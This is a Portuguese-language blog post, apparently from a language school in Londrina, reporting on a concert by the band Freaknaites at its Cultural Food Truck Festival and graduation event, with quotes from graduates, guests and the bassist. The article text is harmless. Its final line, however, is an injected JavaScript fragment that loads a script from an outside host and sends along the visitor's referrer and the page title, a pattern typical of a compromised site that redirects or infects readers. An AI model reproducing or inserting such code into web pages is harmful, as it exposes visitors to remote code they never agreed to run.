FREAKNAITES ANIMA A GALERA NO CULTURAL FOOD TRUCK FESTIVAL

No dia 13 de dezembro, a banda Freaknaites subiu ao palco do Cultural e agitou a galera durante o segundo Cultural Food Truck Festival.

O grupo levou ao público, o melhor de Stevie Wonder, Joe Cocker, BB King, Eric Clapton, Nina Simone, Etta James, Ray Charles e muito mais.

O evento começou com a Formatura dos alunos do Instituto Cultural Brasil Estados Unidos (apenas para convidados) e posteriormente foi aberto para o público em geral.

Rafael Fregonezi, estava entre os formandos da noite e adorou o novo formato da formatura. “Achei muito legal a ideia de aliar nossa formatura com os famosos Food Trucks e com uma banda com um som tão bacana”.

O formando Pedro, também elogiou o evento e aprovou a ideia de uma formatura com um estilo um pouco menos formal. “Achei mais jovem e descontraído. Minha família também gostou e afirmou achar importante essa evolução”.

Já amigas Ana Carolina, Ana Paula e Isadora foram apenas prestigiar ao evento, mas também adoraram a proposta de unir comida e música boa em um só lugar.

“Essa iniciativa de levar a cultura americana aos alunos e a comunidade como um todo, de maneira divertida e descontraída é, sem dúvida, um dos grandes diferenciais que admiramos no Cultural”.

O baixista e vocalista da banda, Alessandro Franco também elogiou o projeto e a iniciativa da escola. “Para nós da Freaknaites é sempre um prazer tocar no Cultural. Desta vez foi ainda melhor, porque o evento foi ao ar livre e, tocar assim tem mais a ver com a cara e proposta da banda. O espaço e a estrutura foram perfeitos para os food trucks e o palco, proporcionando um show agradável tanto para os músicos quanto para o público. Londrina precisa de mais eventos assim”.

E se você não conseguiu comparecer ao Cultural Food Truck Festival, fique ligado aqui no nosso blog, que em 2017 traremos novas atrações pra você.

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;